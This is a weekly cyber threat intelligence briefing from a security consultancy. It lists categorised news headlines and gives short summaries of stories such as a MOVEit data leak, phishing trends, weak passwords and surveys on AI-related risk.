Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek

‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine

Watch Out for Malicious QR Codes Sent Through the Mail

New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers

Scammers resort to physical Swiss post to spread malware • The Register

Fake Bitwarden ads on Facebook push info-stealing Chrome extension

Don't Fall for This Fake Image Generator and Its Political AI Slop

Fake AI video generators infect Windows, macOS with infostealers

NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials

Botnet exploits GeoVision zero-day to install Mirai malware

Researchers unearth two previously unknown Linux backdoors - Help Net Security

Lumma Stealer Proliferation Fueled by Telegram Activity - Infosecurity Magazine

Black Lotus, Emotet, Beep, and Dark Pink, still the top malware threats of 2024 | SC Media

Microsoft accused of Malware-like Bing Wallpaper app - gHacks Tech News

Bots/Botnets

'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse

Dangerous global botnet fueling residential proxies is being hit in major crackdown | TechRadar

Botnet serving as ‘backbone’ of malicious proxy network taken offline | CyberScoop

Mobile

The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek

No work phone? Companies tell staff to bring their own

Mobile UK on fraud ahead of Reeves' Mansion House speech

Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks

Protect Your Phone From Juice Jacking: Public Charging Risks Explained

New Ghost Tap attack abuses NFC mobile payments to steal money

NSO Group used another WhatsApp zero-day after being sued, court docs say

LightSpy Spyware Operation Expands to Windows - SecurityWeek

It’s Time to Get Paranoid About Your Phone, Says This Security Expert | KQED

iOS 18 reboots iThings after 72 hours - secretly and smartly • The Register

This hacking tool can unlock an iPhone 16. Here's how it works | Digital Trends

You Can Prevent Smishing Scams With These Features and Tricks

Denial of Service/DoS/DDoS

DDoS Attack Growing Bigger & Dangerous, New Report Reveals

Internet of Things – IoT

Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek

'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse

Eken hit with $700K fine for putting an inactive address on FCC filings - The Verge

Data Breaches/Leaks

Ten Lessons Learned from The Mother of All Breaches Data Leak - Security Boulevard

97% of organisations hit by Gen AI-related security breaches, survey finds

Fintech giant Finastra confirms it's investigating a data breach | TechCrunch

Equinox discloses data breach involving health info of clients, staff | Reuters

T-Mobile confirms it was hacked in recent wave of telecom breaches

What is Data Egress? How It Works and How to Manage Costs | Definition from TechTarget

Threat actor sells data of +750,000 patients from a French hospital

US-UK Armed Forces Dating Service Exposes Over 1 Million Records Online

We Can Do Better Than Free Credit Monitoring After a Breach

Breaches Don't Have to Be Disasters

The Crucial Influence of Human Factors in Security Breaches - Security Boulevard

171K AnnieMac customers informed of data breach • The Register

Space tech giant Maxar confirms hacker accessed employees' personal data | TechCrunch

Ford 'actively investigating' breach claims • The Register

Ford rejects breach allegations, says customer data not impacted

Helpline for Yakuza victims fears it leaked personal info • The Register

Andrew Tate Hack: Online Course Data Breached

Organised Crime & Criminal Actors

Cyber criminals don’t take holidays warns expert

Microsoft killed 240 sites selling ONNX phishing kits

5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme

Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek

Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News

Targeting the Cyber Crime Supply Chain - Microsoft On the Issues

US seizes PopeyeTools cyber crime marketplace, charges administrators

AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard

Russian women stepping up for cyber crime outfits | SC Media

UK supports Nigeria to tackle cyber threats

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek

Crypto Tool or Data Thief? How Meme-Token-Hunter-Bot and Its Clones Steal from macOS Users | HackerNoon

Now BlueSky hit with crypto scams as it crosses 20 million users

Insider Risk and Insider Threats

The Crucial Influence of Human Factors in Security Breaches - Security Boulevard

Insurance

Cyber Threats, Changes in Climate, and Business Interruption are Insurance Buyers’ and Sellers’ Top Risk Concerns, Says New Munich Re/Triple-I Survey | Business Wire

Coalition highlights 68% surge in ransomware claims severity - Reinsurance News

Cyber threats, climate change, and BI lead insurance concerns: Munich Re & Triple-I - Reinsurance News

Cyber insurers address ransom reimbursement policy concerns | TechTarget

Marsh launches cyber security compliance program | Insurance Business America

CISOs can now obtain professional liability insurance | CyberScoop

Supply Chain and Third Parties

Supply chain attacks up over 400 percent since 2021

Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs

IT pros revise pipelines for software supply chain security | TechTarget

Gatwick Airport's Cyber Security Chief on Supply Chain Risks - Infosecurity Magazine

Cloud/SaaS

Cloud ransomware threats rise, targeting S3 & Azure

Cracking the Code: Tackling the Top 5 Cloud Security Challenges - Security Boulevard

Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine

Outages

After the CrowdStrike disaster, Microsoft is improving Windows security to avoid outages

Identity and Access Management

One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine

The Problem of Permissions and Non-Human Identities - Why Remediating Credentials Takes Longer Than You Think

The trouble with identity in an increasingly fake world | SC Media

Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority

Five Cyber Agencies Sound Alarm About Active Directory Attacks: Beyond the Basics - Security Boulevard

10 Most Impactful PAM Use Cases for Enhancing Organisational Security

Encryption

Now Online Safety Act is law, UK outlines 'priorities' • The Register

NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition

Linux and Open Source

Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root

Debunking myths about open-source security - Help Net Security

Open Cyber Security Schema Framework (OCSF) Joins the Linux Foundation to Optimize Critical Security Data

Linux Variant of Helldown Ransomware Targets VMware

Researchers unearth two previously unknown Linux backdoors - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

123456 is the world's most popular password – again | Tom's Guide

Research Highlights SHA256 Password Security Strengths and Risks - IT Security Guru

700,000 passengers suffered delays after password of engineer allowed to work remotely... - LBC

Navigating NIST’s updated password rotation guidelines | TechRadar

More than 200 major companies already support passkeys

Put your usernames and passwords in your will, Japan advises • The Register

Social Media

Ireland orders X, TikTok and Instagram to curb terrorist content | Ireland | The Guardian

Fake Bitwarden ads on Facebook push info-stealing Chrome extension

Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop

NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

Canada Shuts Down TikTok Office Over National Security Risks

Now BlueSky hit with crypto scams as it crosses 20 million users

Malvertising

Fake Bitwarden ads on Facebook push info-stealing Chrome extension

NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data

How does malvertising work? | TechTarget

Training, Education and Awareness

Cyber Awareness Is a Joke: Here’s How to Actually Prepare for Attacks

New educational campaign "Flex Your Cyber" launched - IT Security Guru

KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience - IT Security Guru

Regulations, Fines and Legislation

Cyber Security Transparency Under Fire: Tech Firms Pay Big for Downplaying SolarWinds Breaches | Miller Nash LLP - JDSupra

The SEC Cyber Security Rule: Awareness Rises, Compliance Lags - Security Boulevard

76% of Cyber Security Professionals Believe AI Should Be Heavily Regulated, New Study by StrongDM Finds

The Cyber Resilience Act published

NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra

ENISA's Draft NIS2 Guidance Consultation for Industry

Beyond The EU: How British Businesses Can Prepare For NIS2

EU Council approves declaration on international law in cyber space - JURIST - News

Preparing for DORA Compliance in 2025 - Financial News

Increased GDPR Enforcement Highlights the Need for Data Security

A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine

Now Online Safety Act is law, UK outlines 'priorities' • The Register

What CISOs need to know about the SEC’s breach disclosure rules | CSO Online

CISA no more? Rand Paul has a plan, and it’s not good for US cyber defenders | Cybernews

Trump 2.0 May Mean Fewer Cyber Security Regs

With Rise in Healthcare Data Breaches, Compliancy Group Urges Organisations to Complete Their HIPAA Security Risk Assessments

The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog

What a second Trump term means for the future of ransomware | TechCrunch

Why the NIS2 Directive causes growing pains for businesses - Help Net Security

CISA Dir. Jen Easterly to Resign on Inauguration Day

Czech banks on alert: Czech National Bank's adoption of TIBER-EU signals new era in cyber security supervision

With Tech Considerations for Securities Lawyers | Mayer Brown Free Writings + Perspectives - JDSupra

Models, Frameworks and Standards

A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine

The Cyber Resilience Act published

NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra

ENISA's Draft NIS2 Guidance Consultation for Industry

Beyond The EU: How British Businesses Can Prepare For NIS2

Preparing for DORA Compliance in 2025 - Financial News

Increased GDPR Enforcement Highlights the Need for Data Security

With Rise in Healthcare Data Breaches, Compliancy Group Urges Organisations to Complete Their HIPAA Security Risk Assessments

Open Cyber Security Schema Framework (OCSF) Joins the Linux Foundation to Optimize Critical Security Data

NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition

Backup and Recovery

Five backup lessons learned from the UnitedHealth ransomware attack - Help Net Security

Law Enforcement Action and Take Downs

5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme

Brit charged in US over Scattered Spider cyber attacks | Computer Weekly

Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek

US seizes PopeyeTools cyber crime marketplace, charges administrators

Man avoids conviction after hacker finds AI-generated child exploitation images on his computer - NZ Herald

Office of Public Affairs | California Teenager Pleads Guilty in Florida to Making Hundreds of ‘Swatting’ Calls Across the United States | United States Department of Justice

Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News

Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop

UK supports Nigeria to tackle cyber threats

Misinformation, Disinformation and Propaganda

Terrorists Exploit AI for Propaganda and Operations, Exposing Critical Gaps in Tech Safeguards - The Media Line


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Artificial intelligence, international security, and the risk of war

Sweden, Finland and Norway release new advice on surviving war - BBC News

Nation State Actors

China

A Look at Trending Chinese APT Techniques | Intel 471

UK warned of cyber threats from China-backed Volt Typhoon

China Espionage Soon ‘the Number 1 Issue’ for US Security Community: Cyber Security Expert | NTD

Chinese hackers are using this open-source VPN to mask spying activities | TechRadar

T-Mobile confirms it was hacked in recent wave of telecom breaches

Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign

Cyber-espionage group Volt Typhoon resurfaces globally

LightSpy Spyware Operation Expands to Windows - SecurityWeek

China-Backed Hackers Leverage SIGTRAN, GSM Protocols to Infiltrate Telecom Networks

State-Sponsored Cyber Attacks: T-Mobile, Singtel Breaches & AI/ML in Telecom Security - Modern Diplomacy

Chinese APT Group Targets Telecom Firms Linked to BRI - Infosecurity Magazine

Chinese spies, Musk’s biz ties, ‘a real risk’ to US security • The Register

Chinese spies and the security of America's networks

China's Liminal Panda APT Attacks Telcos, Steals Data

Chinese ship casts shadow over Baltic subsea cable snipfest • The Register

Suspected undersea cable sabotage had ‘little-to-no observable impact’ on internet service and quality — Cloudflare says suspected sabotage incident mitigated with redundant design | Tom's Hardware

Canada Shuts Down TikTok Office Over National Security Risks

Lithuania bans remote Chinese access to solar, wind, storage devices – pv magazine International

Coast Guard Warns of Continued Risks in Chinese Port Cranes

Russia

UAWire - Russia's hybrid warfare tactics intensify: EU faces heightened threat from espionage and cyber attacks

Severed subsea internet cables raise network security questions | ITPro

Suspected undersea cable sabotage had ‘little-to-no observable impact’ on internet service and quality — Cloudflare says suspected sabotage incident mitigated with redundant design | Tom's Hardware

Sweden, Finland and Norway release new advice on surviving war - BBC News

Russian women stepping up for cyber crime outfits | SC Media

FBI says BianLian based in Russia, moving from ransomware attacks to extortion

BianLian Ransomware Group Adopts New Tactics, Posing Significant Risk - Infosecurity Magazine

Russian sanctions busting linked to British Overseas Territories

Undersea cable between Germany and Finland severed - BBC News

Finland and Lithuania Report Severed Undersea Data Cables - Bloomberg

Fears of sabotage rise after Baltic cable disruptions

North Korea

North Korean Front Companies Impersonate US IT Firms to Fund Missile Programs

Active network of North Korean IT front companies exposed - Help Net Security

North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Terrorists Exploit AI for Propaganda and Operations, Exposing Critical Gaps in Tech Safeguards - The Media Line

LightSpy Spyware Operation Expands to Windows - SecurityWeek

NSO Group used another WhatsApp zero-day after being sued, court docs say

The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog


Tools and Controls

The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek

No work phone? Companies tell staff to bring their own

Rethinking Cyber Security From Cost Center To Value Driver

Cyber Threats, Changes in Climate, and Business Interruption are Insurance Buyers’ and Sellers’ Top Risk Concerns, Says New Munich Re/Triple-I Survey | Business Wire

Cyber threats, climate change, and BI lead insurance concerns: Munich Re & Triple-I - Reinsurance News

Companies Take Over Seven Months to Recover From Cyber Incidents - Infosecurity Magazine

State of SIEM Detection Risk: A Wake-Up Call for Enterprise Security Teams - Security Boulevard

Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection - SecurityWeek

5 Threat Intel Tricks MSSPs Can Use to Thwart Adversaries | MSSP Alert

Underfunded, under pressure: We must act to support cyber teams | Computer Weekly

Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly

Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media

The Problem of Permissions and Non-Human Identities - Why Remediating Credentials Takes Longer Than You Think

The trouble with identity in an increasingly fake world | SC Media

How Cloud Security Advances Help Future-Proof Resilience

Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority

Avoiding Common API Security Mistakes

Hackers Aren’t Cutting Back, Why is Your Security Budget?

Applying the Enterprise Risk Mindset to Navigate Cyber Security Threats - New Risk Mindset Series | Mayer Brown - JDSupra

Five Cyber Agencies Sound Alarm About Active Directory Attacks: Beyond the Basics - Security Boulevard

Adopting more security tools doesn't keep you safe, it just overloads your teams and creates greater risks | ITPro

Cross-Site Scripting: 2024's Most Dangerous Software

Cyber criminals hijack DNS to build stealth attack networks - Help Net Security

Unlocking the power of public data to make your security team faster and more effective | SC Media

Safeguarding the DNS through registries - Help Net Security

Red red team team: threat actors hire pentesters to test out ransomware effectiveness | SC Media

Weaponized pen testers are becoming a new hacker staple | CSO Online

5 Questions CISOs Should Be Asking Regarding DSPM

8 Security Risks Of Shared Email Accounts - Security Boulevard

Guarding Your Brand: Why Domain Protection is Essential for Every Business Owner - Security Boulevard

Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE

Eight essential steps to fortify cyber security after a breach | SC Media

The limits of AI-based deepfake detection - Help Net Security

Navigating NIST’s updated password rotation guidelines | TechRadar

How Can PR Protect Companies During a Cyber Attack?

We Need to Talk: Breaking up With Your SIEM Vendor | MSSP Alert


Other News

Severed subsea internet cables raise network security questions | ITPro

Cyber Security is Everyone’s Responsibility - Security Boulevard

8 Security Risks Of Shared Email Accounts - Security Boulevard

300 Drinking Water Systems in US Exposed to Disruptive, Damaging Hacker Attacks - SecurityWeek

Cross-Site Scripting: 2024's Most Dangerous Software

Weaponized pen testers are becoming a new hacker staple | CSO Online

Eight essential steps to fortify cyber security after a breach | SC Media

Telecom Cable Disruption Reported Between Finland and Germany - Nord News

Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop

Cyber attack leaves Stop & Shop shelves empty 10 days before Thanksgiving - CBS News

6 Ways Your Computer Isn't as Secure as You Think

The rising tide of maritime cyberthreats in global trade | TechRadar

Nearly 90% of UK industrial firms hit by cyber attacks in past year - Drives&Controls

ICS Security: 145,000 Systems Exposed to Web, Many Industrial Firms Hit by Attacks - SecurityWeek

5 alarming Windows cyber security facts you probably don’t know

Cisco reveals top cyber security threats trends

Expert warns construction industry on costly ransomware attacks | Project Scotland

Australian government cyber security falls in global ranking | The Canberra Times | Canberra, ACT

Cyber security tips for the education sector | Education Business

Navigating the surge of cyber threats in global maritime

Thames Water’s IT ‘falling apart’ and is hit by cyber-attacks, sources claim | Thames Water | The Guardian

Thames Water Dismisses Claims on Cyber-Attacks | SC Media UK

Fortra Reports Alarming Increase In Abuse Of Cloudflare Services

Airplane cyber security: Past, present, future

70% of Hong Kong companies saw cyber attacks in 2024

Gambling and lottery giant disrupted by cyber attack, working to bring systems back online

CISA Director Jen Easterly to depart agency on January 20 | TechCrunch


Vulnerability Management

Microsoft beefs up Windows security with new recovery and patching features | TechCrunch

CWE top 25 most dangerous software weaknesses - Help Net Security

MITRE shares 2024's top 25 most dangerous software weaknesses

Vulnerabilities

Critical 9.8-rated VMware vCenter RCE bug under exploit • The Register

Warning: VMware vCenter and Kemp LoadMaster Flaws Under Active Exploitation

Microsoft Vulnerability Poses Risk To Domain Control

Critical RCE bug in VMware vCenter Server now exploited in attacks

Mystery Palo Alto Networks 0-day RCE now actively exploited • The Register

PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released

Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek

Millions of WordPress sites potentially hijackable due to critical plugin bug | SC Media

Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities

Chrome Security Update, Fix For Multiple Vulnerabilities

Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root

Fortinet VPN design flaw hides successful brute-force attacks

Microsoft pauses Exchange security updates over buggy patch • The Register

Microsoft Pulls Exchange Patches Amid Mail Flow Issues

Security plugin flaw in millions of WordPress sites gives admin access

Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) - Help Net Security

Linux Variant of Helldown Ransomware Targets VMware

Exploitation Attempts Target Citrix Session Recording Vulnerabilities - SecurityWeek

Helldown ransomware exploits Zyxel VPN flaw to breach networks

NSO Group used another WhatsApp zero-day after being sued, court docs say

D-Link urges users to retire VPN routers impacted by unfixed RCE flaw


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are provided for interest and awareness. Linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.


Black Arrow Cyber Threat Intelligence Briefing 15 November 2024

Black Arrow Cyber Threat Intelligence Briefing 15 November 2024:

-Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies

-Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics

-Critical Vulnerabilities Persist in Finance and Insurance Sectors

-AI-Based Attacks Top Gartner’s List of Emerging Threats – Again

-Here Are the Top 10 Passwords for 2024, and They're All Embarrassing

-Mishing: The Rising Mobile Attack Vector Facing Every Organisation

-80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis

-BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks

-Employees Are Hiding Their AI Use from Their Managers. Here's Why

-CISOs in 2025: Balancing Security, Compliance, and Accountability

-48% of Small Businesses Don’t Offer Cyber Security Training

-Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.

Top Cyber Stories of the Last Week

Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies

A recent massive data breach exploiting a vulnerability in MOVEit file transfer software has exposed sensitive employee data from major companies globally. This incident is one of the largest corporate information leaks, affecting sectors such as finance, healthcare, technology, and retail. The breach resulted in detailed employee records being stolen from 25 leading organisations, including Amazon with over 2.8 million records and MetLife with over 585,000 records. The leaked data includes names, email addresses, phone numbers, and organisational structures, posing significant risks for phishing and identity theft. This incident highlights the critical importance of promptly applying security patches and reinforces the need for robust cyber security measures to protect sensitive corporate data.

Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics

A recent report has found that phishing attacks surged by 28% in Q2 2024, with cybercriminals adopting AI tools and multi-channel tactics. Organisations with over 2,000 employees now face approximately 36 phishing emails per day, overwhelming security systems. There was a 52.2% increase in phishing attacks that bypass secure email gateways, using techniques like QR codes, deepfakes, and HTML smuggling. Payloadless attacks (phishing without links or attachments, instead using social engineering to deceive victims) have risen to nearly 19% of phishing attempts in 2024, up from 5.4% in 2021. Businesses must enhance security measures and foster awareness to combat these sophisticated threats.

Critical Vulnerabilities Persist in Finance and Insurance Sectors

Cyber security provider Black Duck has found that the finance and insurance sectors have the highest number of critical vulnerabilities, with small sites averaging 565 and medium sites 580. Healthcare and social assistance follow closely behind. The most critical issues identified were cryptographic failures and injection vulnerabilities, totalling over 34,800 instances. These weaknesses threaten sensitive data like personally identifiable information and financial records, posing significant business risks. The mean time to remediate varies, with finance addressing issues in 28 days due to strict regulations, while utilities take up to 107 days. Widespread security misconfigurations affect 98% of applications, endangering business continuity and service availability.

AI-Based Attacks Top Gartner’s List of Emerging Threats – Again

Gartner reports that AI-based threats remain the top emerging cyber risks for organisations, with 80% of surveyed executives highlighting AI-enhanced malicious attacks as a major concern. This marks the third consecutive quarter where AI leads in risk rankings. The difficulty in finding skilled AI and cyber security talent is prompting companies to turn to Managed Security Service Providers (MSSPs) for assistance. MSSPs are leveraging AI to combat sophisticated cyber attacks, and over 80% now offer AI-related security services. This represents a significant shift as enterprises struggle to protect themselves against increasingly complex AI-driven threats.

Here Are the Top 10 Passwords for 2024, and They're All Embarrassing

NordPass, in collaboration with NordStellar, has found that weak passwords remain a significant security risk for organisations and individuals alike. Their sixth annual report revealed that '123456' is the most common password globally, used by over 3 million personal users and more than 1.2 million corporate users. The report highlighted that despite increased awareness of password security, it takes less than a second to crack these widely used passwords. Nearly all organisations still face password management challenges, with many employees reusing simple passwords across accounts. The study underscores the need for stronger password practices, including adopting password managers.

Mishing: The Rising Mobile Attack Vector Facing Every Organisation

Recent research highlights that mobile-targeted phishing attacks, collectively termed "mishing", are an escalating threat to organisations. The widespread use of mobile devices for accessing sensitive data has made them prime targets for cyber criminals employing tactics like smishing, vishing and quishing. These attacks exploit unique mobile features, increasing user vulnerability. Despite this rising threat, many organisations lack adequate mobile security measures and underestimate the associated risks. To combat mishing, it is imperative for organisations to implement comprehensive mobile threat defences and educate employees on recognising and avoiding such attacks.

80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis

Riskonnect's recent report highlights that 80% of organisations lack a dedicated plan to address generative AI risks, including AI-driven fraud attacks. Among surveyed professionals, 72% reported that cyber security risks are having a significant or severe impact on their organisations (an increase from last year's 47%) and 24% believe AI-powered cyber security threats will have the biggest impact over the next 12 months. Despite growing concerns over AI ethics, privacy, and security, 65% of companies have not established policies governing the use of generative AI by partners and suppliers, leaving critical risk management gaps unaddressed.

BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks

The Bank of England and UK financial regulators have introduced new rules to enhance IT resilience in financial firms, aiming to reduce risks from cyber attacks and power outages. Effective from 1 January next year, these measures require critical third-party providers to report major incidents and conduct resilience testing. While these providers boost competitiveness, reliance on a few increases systemic risk, potentially affecting consumers and the UK's financial stability. Regulators stress that firms remain accountable for operational resilience, underscoring the need to manage disruption risks to uphold the UK's reputation for stable financial services.

Employees Are Hiding Their AI Use from Their Managers. Here's Why

New research from Slack reveals that enthusiasm for artificial intelligence among employees is waning, with excitement dropping from 47% to 41% globally. Nearly half of desk workers feel uncomfortable with their managers knowing they use AI for common tasks, fearing perceptions of laziness or incompetence. Despite 99% of executives planning to invest in AI this year, a significant skills gap persists, with 61% of employees spending less than five hours learning to use AI tools. The report highlights the need for clear policies and training to address uncertainties and fully harness AI's potential.

CISOs in 2025: Balancing Security, Compliance, and Accountability

Recent regulatory changes, including new SEC and NYDFS rules in the US, have heightened CISO accountability by requiring rapid incident disclosures and increasing personal liability. This intensifies pressures on CISOs, making the role less attractive due to potential legal repercussions and heightened stress. Looking ahead to 2025, CISOs will need advanced skills in strategic communication, risk management, and understanding emerging technologies like AI. Top priorities now include optimising existing security investments, enhancing defences against AI-driven cyber attacks, and investing in advanced cloud security capabilities.

48% of Small Businesses Don’t Offer Cyber Security Training

Recent research has revealed that 48% of UK small businesses do not provide cyber security awareness training to employees. Cyber threats are increasing in volume and complexity, particularly with the rise of AI, yet nearly half (47%) lack up-to-date anti-virus software and 15% have no firewall protection. 81% do not have a valid disaster recovery plan, and 29% have no patch management in place. With 2.39 million businesses experiencing cyber crime in the last 12 months, there is a clear need for businesses to improve their cyber security stance, both technologically and through employee awareness.

Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month

Cyber security provider Netskope has found that phishing attacks are a significant threat in the banking sector, with three in every 1,000 employees clicking on phishing links each month. This equates to over 1,000 banking workers in the UK potentially compromising security monthly. Russian criminal groups are identified as the most active attackers.

Sources:

https://www.infostealers.com/article/massive-moveit-vulnerability-breach-hacker-leaks-employee-data-from-amazon-mcdonalds-hsbc-hp-and-potentially-1000-other-companies/

https://www.techradar.com/pro/phishing-attacks-surge-in-2024-as-cybercriminals-adopt-ai-tools-and-multi-channel-tactics

https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/

https://www.msspalert.com/news/ai-based-attacks-top-gartners-list-of-emerging-threats-again

https://www.cnet.com/tech/services-and-software/here-are-the-top-10-passwords-for-2024-and-theyre-all-embarrassing/

https://www.zimperium.com/blog/mishing-the-rising-mobile-attack-vector-facing-every-organization/

https://www.forbes.com/sites/edwardsegal/2024/11/10/80-of-surveyed-businesses-dont-have-plans-for-an-ai-related-crisis/

https://www.mortgagestrategy.co.uk/news/boe-and-regulators-set-out-digital-rules-to-cut-cyber-attack-risks/

https://www.zdnet.com/article/employees-are-hiding-their-ai-use-from-their-managers-heres-why/

https://www.helpnetsecurity.com/2024/11/13/daniel-schwalbe-domaintools-cisos-2025/

https://www.nationalworld.com/business/48-of-small-businesses-dont-offer-cybersecurity-training-4858633

https://www.techradar.com/pro/security/thousands-of-employees-could-be-falling-victim-to-obvious-phishing-scams-every-month



Threats

Ransomware, Extortion and Destructive Attacks

Scattered Spider, BlackCat criminals claw back • The Register

Critical Veeam RCE bug now used in Frag ransomware attacks

Tackling ransomware without banning ransom payments | TechRadar

The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard

To Pay or Not to Pay: The Ransomware Dilemma - Security Boulevard

OpenText reveals 2024 nastiest malware, LockBit leads list

WHO, 50 countries warn United Nations of increasing ransomware attacks against hospitals - The Hindu

Remarks at a UN Security Council Briefing on Ransomware Attacks against Hospitals and Other Healthcare Facilities and Services – DataBreaches.Net

Cyber attacks on healthcare: A global threat that can’t be ignored | The United Nations Office at Geneva

New Ymir ransomware partners with RustyStealer in attacks

5 BCDR Oversights That Leave You Exposed to Ransomware

Cloud Ransomware Flexes Fresh Scripts Against Web Apps

Busting Ransomware’s Billion-Dollar Boom with Network Observability and Security - Security Boulevard

New ShrinkLocker ransomware decryptor recovers BitLocker password

Idaho Man Turns to RaaS to Extort Orthodontist

Ransomware Victims

Ransomware attack on Bucharest: data of hundreds of thousands of citizens involved – DataBreaches.Net

Cyber Attack Cost Oil Giant Halliburton $35 Million - SecurityWeek

Embargo ransomware claims breach of US pharmacy network • The Register

Phishing & Email Based Attacks

Phishing attacks surge in 2024 as cyber criminals adopt AI tools and multi-channel tactics | TechRadar

Thousands of employees could be falling victim to obvious phishing scams every month | TechRadar

Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium

Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica

New Wave Of Phishing Attacks Exploits Microsoft Visio Files For Two-Step Credential Theft

Most prolific phishing campaign of 2024 | Professional Security Magazine

This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar

Microsoft Exchange adds warning to emails abusing spoofing flaw

If You Fall for a Phishing Email, Here’s What Happens Next

I Almost Fell For a Phishing Scam: Here’s What Happened

Other Social Engineering

Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium

Winter Fuel Payment Scam Targets UK Citizens Via SMS | Tripwire

Scammers target UK senior citizens with Winter Fuel Payment texts

Pensioners Warned Over Winter Fuel Payment Scam Texts - Infosecurity Magazine

Malware being delivered by mail, warns Swiss cyber agency

North America sees social engineering scams multiply by a factor of 10

The terrifying Google Maps tactic now used by email scammers | Tech News | Metro News

Artificial Intelligence

